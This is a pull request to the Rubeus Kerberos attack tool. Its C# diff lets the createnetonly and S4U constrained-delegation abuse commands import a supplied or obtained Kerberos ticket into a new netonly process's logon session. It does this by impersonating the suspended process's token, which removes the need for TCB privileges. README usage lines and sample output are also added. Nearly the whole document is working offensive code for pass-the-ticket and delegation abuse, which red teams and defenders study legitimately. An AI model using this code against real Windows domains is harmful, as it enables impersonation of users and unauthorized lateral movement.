### PR TITLE
Add support for importing tickets into a net only session without needing TCB.

### DIFF
--- a/README.md
+++ b/README.md
@@ -115,11 +115,11 @@ Rubeus is licensed under the BSD 3-Clause license.
      Constrained delegation abuse:
 
         Perform S4U constrained delegation abuse:
-            Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self]
-            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac]
+            Rubeus.exe s4u </ticket:BASE64 | /ticket:FILE.KIRBI> </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/createnetonly:C:\Windows\System32\cmd.exe] [/show]
+            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/opsec] [/self] [/bronzebit] [/nopac] [/createnetonly:C:\Windows\System32\cmd.exe] [/show]
 
         Perform S4U constrained delegation abuse across domains:
-            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self] [/nopac]
+            Rubeus.exe s4u /user:USER </rc4:HASH | /aes256:HASH> [/domain:DOMAIN] </impersonateuser:USER | /tgs:BASE64 | /tgs:FILE.KIRBI> /msdsspn:SERVICE/SERVER /targetdomain:DOMAIN.LOCAL /targetdc:DC.DOMAIN.LOCAL [/altservice:SERVICE] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/self] [/nopac] [/createnetonly:C:\Windows\System32\cmd.exe] [/show]
 
 
      Ticket Forgery:
@@ -242,7 +242,7 @@ Rubeus is licensed under the BSD 3-Clause license.
      Miscellaneous:
 
         Create a hidden program (unless /show is passed) with random /netonly credentials, displaying the PID and LUID:
-            Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" [/show]
+            Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" [/show] [/ticket:BASE64 | /ticket:FILE.KIRBI]
 
         Reset a user's password from a supplied TGT (AoratoPw):
             Rubeus.exe changepw </ticket:BASE64 | /ticket:FILE.KIRBI> /new:PASSWORD [/dc:DOMAIN_CONTROLLER] [/targetuser:DOMAIN\USERNAME]
@@ -3401,6 +3401,28 @@ Create a visible command prompt:
     [+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
     [+] ProcessID       : 5352
     [+] LUID            : 0x4a091c0
+
+Create a visible command prompt and import a ticket:
+
+    C:\Rubeus>Rubeus.exe createnetonly /program:"C:\Windows\System32\cmd.exe" /show /ticket:ticket.kirbi
+
+     ______        _
+    (_____ \      | |
+     _____) )_   _| |__  _____ _   _  ___
+    |  __  /| | | |  _ \| ___ | | | |/___)
+    | |  \ \| |_| | |_) ) ____| |_| |___ |
+    |_|   |_|____/|____/|_____)____/(___/
+
+    v1.3.3
+
+
+    [*] Action: Create Process (/netonly)
+
+    [*] Showing process : True
+    [+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
+    [+] ProcessID       : 5352
+    [+] LUID            : 0x4a091c0
+    [+] Ticket successfully imported!
 
 
 ### changepw

--- a/Rubeus/Commands/Createnetonly.cs
+++ b/Rubeus/Commands/Createnetonly.cs
@@ -1,6 +1,6 @@
 ﻿using System;
 using System.Collections.Generic;
-
+using System.IO;
 
 namespace Rubeus.Commands
 {
@@ -16,6 +16,7 @@ namespace Rubeus.Commands
             string username = null;
             string password = null;
             string domain = null;
+            byte[] kirbiBytes = null;
             bool show = arguments.ContainsKey("/show");
 
             if (arguments.ContainsKey("/program") && !String.IsNullOrWhiteSpace(arguments["/program"]))
@@ -40,18 +41,36 @@ namespace Rubeus.Commands
             {
                 domain = arguments["/domain"];
             }
+            if (arguments.ContainsKey("/ticket"))
+            {
+                string kirbi64 = arguments["/ticket"];
+
+                if (Helpers.IsBase64String(kirbi64))
+                {
+                    kirbiBytes = Convert.FromBase64String(kirbi64);
+                }
+                else if (File.Exists(kirbi64))
+                {
+                    kirbiBytes = File.ReadAllBytes(kirbi64);
+                }
+                else
+                {
+                    Console.WriteLine("\r\n[X]/ticket:X must either be a .kirbi file or a base64 encoded .kirbi\r\n");
+                    return;
+                }
+            }
 
             if (username == null && password == null && domain == null)
             {
                 Console.WriteLine("\r\n[*] Using random username and password.\r\n");
-                Helpers.CreateProcessNetOnly(program, show, username, domain, password);
+                Helpers.CreateProcessNetOnly(program, show, username, domain, password, kirbiBytes);
                 return;
             }
 
             if (!String.IsNullOrWhiteSpace(username) && !String.IsNullOrWhiteSpace(password) && !String.IsNullOrWhiteSpace(domain))
             {
                 Console.WriteLine("\r\n[*] Using " + domain + "\\" + username + ":" + password + "\r\n");
-                Helpers.CreateProcessNetOnly(program, show, username, domain, password);
+                Helpers.CreateProcessNetOnly(program, show, username, domain, password, kirbiBytes);
                 return;
             }
 

--- a/Rubeus/Commands/S4u.cs
+++ b/Rubeus/Commands/S4u.cs
@@ -159,6 +159,14 @@ namespace Rubeus.Commands
                 Console.WriteLine("\r\n[X] If a /tgs is supplied, you must also supply a /msdsspn !\r\n");
                 return;
             }
+            bool show = arguments.ContainsKey("/show");
+            string createnetonly = null;
+
+            if (arguments.ContainsKey("/createnetonly") && !String.IsNullOrWhiteSpace(arguments["/createnetonly"]))
+            {
+                createnetonly = arguments["/createnetonly"];
+                ptt = true;
+            }
 
             if (arguments.ContainsKey("/ticket"))
             {
@@ -168,13 +176,13 @@ namespace Rubeus.Commands
                 {
                     byte[] kirbiBytes = Convert.FromBase64String(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, domain, impersonateDomain);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, domain, impersonateDomain, createnetonly, show);
                 }
                 else if (File.Exists(kirbi64))
                 {
                     byte[] kirbiBytes = File.ReadAllBytes(kirbi64);
                     KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
-                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, domain, impersonateDomain);
+                    S4U.Execute(kirbi, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, hash, encType, domain, impersonateDomain, createnetonly, show);
                 }
                 else
                 {
@@ -194,7 +202,7 @@ namespace Rubeus.Commands
                     return;
                 }
 
-                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, pac);
+                S4U.Execute(user, domain, hash, encType, targetUser, targetSPN, outfile, ptt, dc, altSname, tgs, targetDC, targetDomain, self, opsec, bronzebit, pac, createnetonly, show);
                 return;
             }
             else

--- a/Rubeus/lib/Helpers.cs
+++ b/Rubeus/lib/Helpers.cs
@@ -246,7 +246,7 @@ namespace Rubeus
 
             // 0x00000002 == LOGON_NETCREDENTIALS_ONLY
             // 4 == CREATE_SUSPENDED.
-            if (!Interop.CreateProcessWithLogonW(username, domain, password, 0x00000002, commandLine, String.Empty, 4, 0, null, ref si, out pi))
+            if (!Interop.CreateProcessWithLogonW(username, domain, password, 0x00000002, null, commandLine, 4, 0, Environment.CurrentDirectory, ref si, out pi))
             {
                 var lastError = Interop.GetLastError();
                 Console.WriteLine("[X] CreateProcessWithLogonW error: {0}", lastError);

--- a/Rubeus/lib/Helpers.cs
+++ b/Rubeus/lib/Helpers.cs
@@ -123,9 +123,9 @@ namespace Rubeus
         #endregion
 
 
-            #region Token Helpers
+        #region Token Helpers
 
-            public static bool IsHighIntegrity()
+        public static bool IsHighIntegrity()
         {
             // returns true if the current process is running with adminstrative privs in a high integrity context
             WindowsIdentity identity = WindowsIdentity.GetCurrent();
@@ -196,34 +196,27 @@ namespace Rubeus
         public static LUID GetCurrentLUID()
         {
             // helper that returns the current logon session ID by using GetTokenInformation w/ TOKEN_INFORMATION_CLASS
-
-            var TokenInfLength = 0;
             var luid = new LUID();
 
-            // first call gets lenght of TokenInformation to get proper struct size
-            var Result = Interop.GetTokenInformation(WindowsIdentity.GetCurrent().Token, Interop.TOKEN_INFORMATION_CLASS.TokenStatistics, IntPtr.Zero, TokenInfLength, out TokenInfLength);
-
-            var TokenInformation = Marshal.AllocHGlobal(TokenInfLength);
-
-            // second call actually gets the information
-            Result = Interop.GetTokenInformation(WindowsIdentity.GetCurrent().Token, Interop.TOKEN_INFORMATION_CLASS.TokenStatistics, TokenInformation, TokenInfLength, out TokenInfLength);
+            bool Result;
+            Interop.TOKEN_STATISTICS TokenStats = new Interop.TOKEN_STATISTICS();
+            int TokenInfLength;
+            Result = Interop.GetTokenInformation(WindowsIdentity.GetCurrent().Token, Interop.TOKEN_INFORMATION_CLASS.TokenStatistics, out TokenStats, Marshal.SizeOf(TokenStats), out TokenInfLength);
 
             if (Result)
             {
-                var TokenStatistics = (Interop.TOKEN_STATISTICS)Marshal.PtrToStructure(TokenInformation, typeof(Interop.TOKEN_STATISTICS));
-                luid = new LUID(TokenStatistics.AuthenticationId);
+                luid = new LUID(TokenStats.AuthenticationId);
             }
             else
             {
                 var lastError = Interop.GetLastError();
                 Console.WriteLine("[X] GetTokenInformation error: {0}", lastError);
-                Marshal.FreeHGlobal(TokenInformation);
             }
 
             return luid;
         }
 
-        public static LUID CreateProcessNetOnly(string commandLine, bool show = false, string username = null, string domain = null, string password = null)
+        public static LUID CreateProcessNetOnly(string commandLine, bool show = false, string username = null, string domain = null, string password = null, byte[] kirbiBytes = null)
         {
             // creates a hidden process with random /netonly credentials,
             //  displayng the process ID and LUID, and returning the LUID
@@ -252,7 +245,8 @@ namespace Rubeus
             Console.WriteLine("[*] Password        : {0}", password);
 
             // 0x00000002 == LOGON_NETCREDENTIALS_ONLY
-            if (!Interop.CreateProcessWithLogonW(username, domain, password, 0x00000002, commandLine, String.Empty, 0, 0, null, ref si, out pi))
+            // 4 == CREATE_SUSPENDED.
+            if (!Interop.CreateProcessWithLogonW(username, domain, password, 0x00000002, commandLine, String.Empty, 4, 0, null, ref si, out pi))
             {
                 var lastError = Interop.GetLastError();
                 Console.WriteLine("[X] CreateProcessWithLogonW error: {0}", lastError);
@@ -263,8 +257,8 @@ namespace Rubeus
             Console.WriteLine("[+] ProcessID       : {0}", pi.dwProcessId);
 
             var hToken = IntPtr.Zero;
-            // TOKEN_QUERY == 0x0008
-            var success = Interop.OpenProcessToken(pi.hProcess, 0x0008, out hToken);
+            // TOKEN_QUERY == 0x0008, TOKEN_DUPLICATE == 0x0002
+            var success = Interop.OpenProcessToken(pi.hProcess, 0x000A, out hToken);
             if (!success)
             {
                 var lastError = Interop.GetLastError();
@@ -272,20 +266,43 @@ namespace Rubeus
                 return new LUID();
             }
 
-            var TokenInfLength = 0;
+            if (kirbiBytes != null)
+            {
+                IntPtr hDupToken = IntPtr.Zero;
+                success = Interop.DuplicateToken(hToken, 2, ref hDupToken);
+                if (!success)
+                {
+                    Console.WriteLine("[!] CreateProcessNetOnly() - DuplicateToken failed!");
+                    return new LUID();
+                }
+
+                try
+                {
+                    success = Interop.ImpersonateLoggedOnUser(hDupToken);
+                    if (!success)
+                    {
+                        Console.WriteLine("[!] CreateProcessNetOnly() - ImpersonateLoggedOnUser failed!");
+                        return new LUID();
+                    }
+                    LSA.ImportTicket(kirbiBytes, new LUID());
+                }
+                finally
+                {
+                    Interop.RevertToSelf();
+                    // clean up the handles we created
+                    Interop.CloseHandle(hDupToken);
+                }
+            }
+            Interop.ResumeThread(pi.hThread);
+
             bool Result;
-
-            // first call gets lenght of TokenInformation to get proper struct size
-            Result = Interop.GetTokenInformation(hToken, Interop.TOKEN_INFORMATION_CLASS.TokenStatistics, IntPtr.Zero, TokenInfLength, out TokenInfLength);
-
-            var TokenInformation = Marshal.AllocHGlobal(TokenInfLength);
-
-            // second call actually gets the information
-            Result = Interop.GetTokenInformation(hToken, Interop.TOKEN_INFORMATION_CLASS.TokenStatistics, TokenInformation, TokenInfLength, out TokenInfLength);
+            Interop.TOKEN_STATISTICS TokenStats = new Interop.TOKEN_STATISTICS();
+            int TokenInfLength;
+            Result = Interop.GetTokenInformation(hToken, Interop.TOKEN_INFORMATION_CLASS.TokenStatistics, out TokenStats, Marshal.SizeOf(TokenStats), out TokenInfLength);
+            Interop.CloseHandle(hToken);
 
             if (Result)
             {
-                var TokenStats = (Interop.TOKEN_STATISTICS)Marshal.PtrToStructure(TokenInformation, typeof(Interop.TOKEN_STATISTICS));
                 luid = new LUID(TokenStats.AuthenticationId);
                 Console.WriteLine("[+] LUID            : {0}", luid);
             }
@@ -293,13 +310,9 @@ namespace Rubeus
             {
                 var lastError = Interop.GetLastError();
                 Console.WriteLine("[X] GetTokenInformation error: {0}", lastError);
-                Marshal.FreeHGlobal(TokenInformation);
                 Interop.CloseHandle(hToken);
                 return new LUID();
             }
-
-            Marshal.FreeHGlobal(TokenInformation);
-            Interop.CloseHandle(hToken);
 
             return luid;
         }

--- a/Rubeus/lib/Interop.cs
+++ b/Rubeus/lib/Interop.cs
@@ -1580,7 +1580,7 @@ namespace Rubeus
         public static extern bool GetTokenInformation(
             IntPtr TokenHandle,
             TOKEN_INFORMATION_CLASS TokenInformationClass,
-            IntPtr TokenInformation,
+            out TOKEN_STATISTICS TokenInformation,
             int TokenInformationLength,
             out int ReturnLength);
 
@@ -1597,6 +1597,11 @@ namespace Rubeus
             String currentDirectory,
             ref STARTUPINFO startupInfo,
             out PROCESS_INFORMATION processInformation);
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        public static extern int ResumeThread(
+            IntPtr hThread
+        );
 
         [DllImport("kernel32.dll", SetLastError = true)]
         [return: MarshalAs(UnmanagedType.Bool)]

--- a/Rubeus/lib/S4U.cs
+++ b/Rubeus/lib/S4U.cs
@@ -1,17 +1,14 @@
-﻿using System;
-using System.IO;
-using System.Linq;
-using System.Net;
-using System.Collections.Generic;
-using Asn1;
+﻿using Asn1;
 using Rubeus.lib.Interop;
+using System;
+using System.Net;
 
 
 namespace Rubeus
 {
     public class S4U
     {
-        public static void Execute(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, string targetDomainController = "", string targetDomain = "", bool self = false, bool opsec = false, bool bronzebit = false, bool pac = true)
+        public static void Execute(string userName, string domain, string keyString, Interop.KERB_ETYPE etype, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, string targetDomainController = "", string targetDomain = "", bool self = false, bool opsec = false, bool bronzebit = false, bool pac = true, string createnetonly = null, bool show = false)
         {
             // first retrieve a TGT for the user
             byte[] kirbiBytes = Ask.TGT(userName, domain, keyString, etype, null, false, domainController, new LUID(), false, opsec, "", false, pac);
@@ -30,9 +27,9 @@ namespace Rubeus
             KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
 
             // execute the s4u process
-            Execute(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs, targetDomainController, targetDomain, self, opsec, bronzebit, keyString, etype);
+            Execute(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs, targetDomainController, targetDomain, self, opsec, bronzebit, keyString, etype, createnetonly: createnetonly, show: show);
         }
-        public static void Execute(KRB_CRED kirbi, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, string targetDomainController = "", string targetDomain = "", bool s = false, bool opsec = false, bool bronzebit = false, string keyString = "", Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial, string requestDomain = "", string impersonateDomain = "")
+        public static void Execute(KRB_CRED kirbi, string targetUser, string targetSPN = "", string outfile = "", bool ptt = false, string domainController = "", string altService = "", KRB_CRED tgs = null, string targetDomainController = "", string targetDomain = "", bool s = false, bool opsec = false, bool bronzebit = false, string keyString = "", Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial, string requestDomain = "", string impersonateDomain = "", string createnetonly = null, bool show = false)
         {
             Console.WriteLine("[*] Action: S4U\r\n");
 
@@ -41,14 +38,14 @@ namespace Rubeus
                 // do cross domain S4U
                 // no support for supplying a TGS due to requiring more than a single ticket
                 Console.WriteLine("[*] Performing cross domain constrained delegation");
-                CrossDomainS4U(kirbi, targetUser, targetSPN, ptt, domainController, altService, targetDomainController, targetDomain);
+                CrossDomainS4U(kirbi, targetUser, targetSPN, ptt, domainController, altService, targetDomainController, targetDomain, createnetonly, show);
             }
             else
             {
                 if (tgs != null && String.IsNullOrEmpty(targetSPN) == false)
                 {
                     Console.WriteLine("[*] Loaded a TGS for {0}\\{1}", tgs.enc_part.ticket_info[0].prealm, tgs.enc_part.ticket_info[0].pname.name_string[0]);
-                    S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs, opsec);
+                    S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, tgs, opsec, createnetonly, show);
                 }
                 else
                 {
@@ -75,7 +72,7 @@ namespace Rubeus
                     }
                     else
                     {
-                        self = S4U2Self(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, s, opsec, bronzebit, keyString, encType);
+                        self = S4U2Self(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, s, opsec, bronzebit, keyString, encType, createnetonly, show);
                         if (self == null)
                         {
                             Console.WriteLine("[X] S4U2Self failed, unable to perform S4U2Proxy.");
@@ -84,12 +81,12 @@ namespace Rubeus
                     }
                     if (String.IsNullOrEmpty(targetSPN) == false)
                     {
-                        S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, self, opsec);
+                        S4U2Proxy(kirbi, targetUser, targetSPN, outfile, ptt, domainController, altService, self, opsec, createnetonly, show);
                     }
                 }
             }
         }
-        private static void S4U2Proxy(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", KRB_CRED tgs = null, bool opsec = false)
+        private static void S4U2Proxy(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", KRB_CRED tgs = null, bool opsec = false, string createnetonly = null, bool show = false)
         {
             Console.WriteLine("[*] Impersonating user '{0}' to target SPN '{1}'", targetUser, targetSPN);
             if (!String.IsNullOrEmpty(altService))
@@ -320,7 +317,7 @@ namespace Rubeus
                         if (ptt)
                         {
                             // pass-the-ticket -> import into LSASS
-                            LSA.ImportTicket(kirbiBytes, new LUID());
+                            ImportTicket(kirbiBytes, createnetonly, show);
                         }
                     }
                 }
@@ -409,7 +406,7 @@ namespace Rubeus
                     if (ptt)
                     {
                         // pass-the-ticket -> import into LSASS
-                        LSA.ImportTicket(kirbiBytes, new LUID());
+                        ImportTicket(kirbiBytes, createnetonly, show);
                     }
                 }
             }
@@ -424,7 +421,7 @@ namespace Rubeus
                 Console.WriteLine("\r\n[X] Unknown application tag: {0}", responseTag);
             }
         }
-        private static KRB_CRED S4U2Self(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", bool self = false, bool opsec = false, bool bronzebit = false, string keyString = "", Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial)
+        private static KRB_CRED S4U2Self(KRB_CRED kirbi, string targetUser, string targetSPN, string outfile, bool ptt, string domainController = "", string altService = "", bool self = false, bool opsec = false, bool bronzebit = false, string keyString = "", Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.subkey_keymaterial, string createnetonly = null, bool show = false)
         {
             // extract out the info needed for the TGS-REQ/S4U2Self execution
             string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
@@ -580,7 +577,7 @@ namespace Rubeus
                 if (ptt && self)
                 {
                     // pass-the-ticket -> import into LSASS
-                    LSA.ImportTicket(kirbiBytes, new LUID());
+                    ImportTicket(kirbiBytes, createnetonly, show);
                 }
 
                 return cred;
@@ -599,7 +596,7 @@ namespace Rubeus
             return null;
         }
 
-        private static void CrossDomainS4U(KRB_CRED kirbi, string targetUser, string targetSPN, bool ptt, string domainController = "", string altService = "", string targetDomainController = "", string targetDomain = "")
+        private static void CrossDomainS4U(KRB_CRED kirbi, string targetUser, string targetSPN, bool ptt, string domainController = "", string altService = "", string targetDomainController = "", string targetDomain = "", string createnetonly = null, bool show = false)
         {
             // extract out the info needed for the TGS-REQ/S4U2Self execution
             string userName = kirbi.enc_part.ticket_info[0].pname.name_string[0];
@@ -649,7 +646,7 @@ namespace Rubeus
         }
 
         // to perform the 2 S4U2Self requests
-        private static KRB_CRED CrossDomainS4U2Self(string userName, string targetUser, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, bool cross = true, string altService = "", bool self = false, string requestDomain = "", bool ptt = false)
+        private static KRB_CRED CrossDomainS4U2Self(string userName, string targetUser, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, bool cross = true, string altService = "", bool self = false, string requestDomain = "", bool ptt = false, string createnetonly = null, bool show = false)
         {
             // die if can't get IP of DC
             string dcIP = Networking.GetDCIP(targetDomainController);
@@ -753,7 +750,7 @@ namespace Rubeus
                 if (ptt)
                 {
                     // pass-the-ticket -> import into LSASS
-                    LSA.ImportTicket(kirbiBytes, new LUID());
+                    ImportTicket(kirbiBytes, createnetonly, show);
                 }
 
                 return kirbi;
@@ -772,7 +769,7 @@ namespace Rubeus
         }
 
         // to perform the 2 S4U2Proxy requests
-        private static KRB_CRED CrossDomainS4U2Proxy(string userName, string targetUser, string targetSPN, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, Ticket tgs = null, bool cross = true, bool ptt = false)
+        private static KRB_CRED CrossDomainS4U2Proxy(string userName, string targetUser, string targetSPN, string targetDomainController, Ticket ticket, byte[] clientKey, Interop.KERB_ETYPE etype, Interop.KERB_ETYPE requestEType, Ticket tgs = null, bool cross = true, bool ptt = false, string createnetonly = null, bool show = false)
         {
             string dcIP = Networking.GetDCIP(targetDomainController);
             if (String.IsNullOrEmpty(dcIP)) { return null; }
@@ -913,7 +910,7 @@ namespace Rubeus
                 if (ptt && cross)
                 {
                     // pass-the-ticket -> import into LSASS
-                    LSA.ImportTicket(kirbiBytes, new LUID());
+                    ImportTicket(kirbiBytes, createnetonly, show);
                 }
 
                 KRB_CRED kirbi = new KRB_CRED(kirbiBytes);
@@ -954,6 +951,18 @@ namespace Rubeus
                 Console.WriteLine("      {0}", kirbiString);
             }
             Console.WriteLine("");
+        }
+
+        private static void ImportTicket(byte[] kirbiBytes, string createnetonly, bool show)
+        {
+            if (!string.IsNullOrEmpty(createnetonly))
+            {
+                Helpers.CreateProcessNetOnly(createnetonly, show, kirbiBytes: kirbiBytes);
+            }
+            else
+            {
+                LSA.ImportTicket(kirbiBytes, new LUID());
+            }
         }
     }
 }


### PR DESCRIPTION
This PR adds supports for the `createnetonly` and `S4U` commands to automatically import a ticket into the logon session of a new net only process. This uses the fact that if you import the ticket while impersonating the new process' token the LSA will importing it to the new session rather the caller's current session. This allows simple one shot creation of a new process with the new ticket without TCB privileges.